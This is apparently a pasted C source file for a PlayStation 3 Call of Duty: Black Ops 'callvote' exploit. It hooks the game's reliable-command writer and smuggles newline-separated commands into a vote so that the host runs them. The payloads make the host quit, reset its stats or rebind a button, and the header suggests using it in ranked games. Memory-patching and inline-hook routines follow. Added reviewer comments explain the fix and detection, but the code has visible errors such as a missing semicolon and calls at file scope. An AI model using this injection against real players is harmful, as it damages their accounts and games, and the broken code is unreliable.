Jo-Milk

Bo1 Non-Host Infection A.K.A. CallVote Exploit

Sep 26th, 2018
  1. /*Bo1 Nonhost Infection A.K.A. CallVote Exploit
  2. Credits:
  3. http://old.zenhax.com/quake3-engine-callvote-bug-t686.html
  4.  
  5. Luigi for documenting Quake 3 callvote Exploit
  6. 01cedricv2 for showing Quake documentation to Jo-Milk
  7. and Jo-Milk for porting to PS3
  8.  
  9. This can be ported on Bo2 [Tested] and Other cods
  10. This infects the host once Vote passes to do so
  11. you need to join your friend in a private match
  12. He'll need to be the host:
  13. 1st way is:
  14.  you tell him to go spectator and you spawn in and use cbuf_AddText
  15. 2nd way is:Everyone leaves or go spectator [Besides the host] to infect the host
  16.  
  17. this exploit on ps3 is hard to use online my main use of this is to prestige my friends without going on their accounts but if you where to have a few jailbreaks you could bind a button cmd vote yes and push the call vote on a ranked game
  18. */
  19.  
// TOC (table-of-contents base) of the game executable. The trailing "1.13" is
// the game version these constants were taken from; every bare address in this
// file is version-specific.
#define TOC 0x0072DCE8//1.13
// Selects which case of the switch in MSG_WriteReliableCommand_Hook fires
// (0, 1 or 2); any other value makes the hook forward the command unchanged.
int var = 1;//change this value to change the infection type

// Hand-built two-word function descriptor {entry address, TOC}. Presumably the
// PPC64 ELF layout (code pointer followed by TOC pointer) — TODO confirm; the entry
// address is an unlabelled constant with no symbol to check it against.
int cbuf[] = { 0x00399CC8, TOC };
// The game's Cbuf_AddText, reached by treating the array above as its descriptor.
void(*CBuf_AddText)(int client, char* cmd) = (void(*)(int, char*))&cbuf;
  25.  
// Placeholder body. HookFunctionStart (below) overwrites this function at runtime
// with a trampoline — the displaced first instructions of the hooked function plus
// a jump back into it — so calling this is how MSG_WriteReliableCommand_Hook
// reaches the original MSG_WriteReliableCommand. The seven __nop() calls only
// reserve enough bytes (0x20, eight instruction words) for that trampoline; the
// body as written is never what executes.
void MSG_WriteReliableCommand_HookStub(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos) {
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
    __nop();
}
  35.  
// Detour installed over the client's outgoing reliable-command writer. When the
// command being written is the marker string queued through CBuf_AddText, the
// text is swapped for one of the payload strings below before it is handed to the
// original function (via the stub); every other command is passed through untouched.
//
// Security note (what makes this work, and how a server defends against it): the
// vote argument reaches the host's command buffer with embedded '\n' characters,
// and the host's command parser treats '\n' as a command separator, so one
// "callvote" carries extra commands that run on the host once the vote is
// processed. This is the long-known Quake 3 engine callvote bug referenced in the
// file header. The server-side fix is input validation: reject or strip ';',
// '\n' and '\r' in any client-supplied command argument (ioquake3's
// Cmd_CallVote_f does this and replies "Invalid vote string"), and check callvote
// parameters such as map names against an allow-list instead of echoing the raw
// string into Cbuf.
void MSG_WriteReliableCommand_Hook(const char *pszCommand, char **pszBuffer, char *allocBufferBase, int allocBufferLength, int *allocBufferPos)
{
    // Match on the exact marker text; the author's note suggests pszBuffer as the
    // alternative to compare if pszCommand does not hold the command here.
    if (strcmp(pszCommand, "callvote map mp_nuked;Jo-Milk") == 0)//if dont work try pszBuffer
    {
        // `var` (file-scope, set above) picks the replacement; every path still
        // goes through the stub, i.e. the original function, exactly once.
        switch (var)
        {
        case 0:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nbind button_back say ^1hacked by ^2Jo-Milk ^1Visit ^5www.youtube.com/c/JoMilk15MoDz for More\nstatsetbyname RANK 50\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//RANK 50 not fully done
        case 1:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nquit\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//kick host to XMB
        case 2:MSG_WriteReliableCommand_HookStub("callvote map \"mp_nuked\nresetStats\n\"", pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;//Derank
        // Unknown `var`: forward the marker command as-is.
        default:MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos); break;
        }

    }
    else
    {
        // Not the marker: pass the command through unchanged.
        MSG_WriteReliableCommand_HookStub(pszCommand, pszBuffer, allocBufferBase, allocBufferLength, allocBufferPos);
    }
}
  54. /*basically we replaced ';' by '\n' in the hook making the host execute the whole line of dvars instead of one
  55. but in cbuf_AddText you want ';' to avoid the game from executing the line of dvars on yourself*/
  56.  
/*Call this somewhere outside of the MSG_WriteReliableCommand_Hook*/
// NOTE(review): this is a bare call at file scope, and the name (cBuf_Addtext)
// does not match the pointer declared above (CBuf_AddText) — as written it is
// neither valid outside a function body nor a resolvable identifier, so read it
// as a snippet the author expects to be placed inside one. The string it queues
// is the marker that MSG_WriteReliableCommand_Hook compares against.
cBuf_Addtext(0, "cmd callvote map \"mp_nuked;Jo-Milk\"\n");
  59.  
  60. /*--------------------------------------------------Extra----------------------------------------------------------------------*/
  61. //read write syscalls
// Thin wrapper over PS3 system call 904: read `size` bytes of the calling
// process's memory at `address` into `data`. system_call_4, sys_process_getpid
// and return_to_user_prog come from the PS3 SDK headers, which this paste does
// not include; return_to_user_prog yields the syscall's int32_t status.
// Ownership: `data` is caller-owned and must be at least `size` bytes.
 int32_t sys_dbg_read_process_memory(uint64_t address, void *data, size_t size)
{
    system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    return_to_user_prog(int32_t);
}
  67.  
// Templated convenience wrapper around sys_dbg_read_process_memory.
// NOTE(review): `data` is taken BY VALUE, so `&data` is the address of the local
// copy and whatever is read is discarded when this returns; if T is a pointer
// type the read overwrites the pointer itself, not what it points to. Not used
// anywhere in this paste. `address` is 32-bit here and widened for the syscall.
template<typename T>
int32_t ReadProcessMemory(uint32_t address, T data, size_t size)
{
    return sys_dbg_read_process_memory(address, &data, size);
}
  73.  
// Thin wrapper over PS3 system call 905: write `size` bytes from `data` into the
// calling process's memory at `address` (the write-side twin of the 904 wrapper
// above). Returns the syscall's int32_t status via return_to_user_prog.
// `data` must point to at least `size` readable bytes; nothing here checks that.
int32_t sys_dbg_write_process_memory(uint64_t address, const void *data, size_t size)
{
    system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    return_to_user_prog(int32_t);
}
  79.  
// Templated convenience wrapper around sys_dbg_write_process_memory: writes the
// bytes of the by-value copy `value` to `address`. This is sound for plain value
// types, but `size` is caller-supplied and not checked against sizeof(T), so a
// `size` larger than sizeof(T) reads past the copy on the stack; for pointer T
// it writes the pointer's own bytes, not the pointee's. Not used in this paste.
template<typename T>
int32_t WriteProcessMemory(uint32_t address, const T value, size_t size)
{
    return sys_dbg_write_process_memory(address, &value, size);
}
  85.  
// Installs an inline hook on a PowerPC function: the first four instructions
// (0x10 bytes) at functionStartAddress are replaced with an absolute jump to
// newFunction, and a trampoline is written at functionStub that replays the four
// displaced instructions and then jumps to functionStartAddress + 0x10.
// Instruction encodings used (PowerPC, r11 as scratch):
//   0x3D600000 | hi16 -> lis   r11, hi16
//   0x616B0000 | lo16 -> ori   r11, r11, lo16
//   0x7D6903A6        -> mtctr r11
//   0x4E800420        -> bctr
// NOTE(review): replaying the displaced instructions verbatim is only correct when
// none of them is PC-relative (e.g. a relative branch); nothing here checks that,
// and r11 is clobbered on entry to both the detour and the trampoline.
// From a detection standpoint the artefact is exactly this lis/ori/mtctr/bctr
// sequence at a function's entry point, which a code-page integrity check can flag.
// Return values of the two syscall wrappers are ignored.
void HookFunctionStart(uint32_t functionStartAddress, uint32_t newFunction, uint32_t functionStub)
{
    // 8 words for the trampoline (4 saved + 4 jump), 4 words for the detour.
    uint32_t normalFunctionStub[8], hookFunctionStub[4];
    // Save the four instructions the detour will overwrite.
    sys_dbg_read_process_memory(functionStartAddress, normalFunctionStub, 0x10);
    // `+` binds tighter than `>>`/`&`, so these are (addr + 0x10) >> 16 and
    // (addr + 0x10) & 0xFFFF: the address of the first instruction not displaced.
    normalFunctionStub[4] = 0x3D600000 + ((functionStartAddress + 0x10 >> 16) & 0xFFFF);
    normalFunctionStub[5] = 0x616B0000 + (functionStartAddress + 0x10 & 0xFFFF);
    normalFunctionStub[6] = 0x7D6903A6;
    normalFunctionStub[7] = 0x4E800420;
    // Trampoline goes over the stub function's nop body (0x20 bytes).
    sys_dbg_write_process_memory(functionStub, normalFunctionStub, 0x20);
    // Detour: absolute jump to newFunction.
    hookFunctionStub[0] = 0x3D600000 + ((newFunction >> 16) & 0xFFFF);
    hookFunctionStub[1] = 0x616B0000 + (newFunction & 0xFFFF);
    hookFunctionStub[2] = 0x7D6903A6;
    hookFunctionStub[3] = 0x4E800420
    sys_dbg_write_process_memory(functionStartAddress, hookFunctionStub, 0x10);
}
  101.  
// Installs the hook. 0x3CCAF8 is an unlabelled, version-specific address (the
// game's MSG_WriteReliableCommand, going by the hook's name). The
// `*(uint32_t*)fn` dereferences read the first word of each function's
// descriptor — presumably the code address under the PPC64 function-descriptor
// layout, consistent with the hand-built `cbuf` descriptor above — TODO confirm.
// Like the cBuf_Addtext call above, this sits at file scope and would have to be
// placed inside a function.
HookFunctionStart(0x3CCAF8, *(uint32_t*)MSG_WriteReliableCommand_Hook, *(uint32_t*)MSG_WriteReliableCommand_HookStub);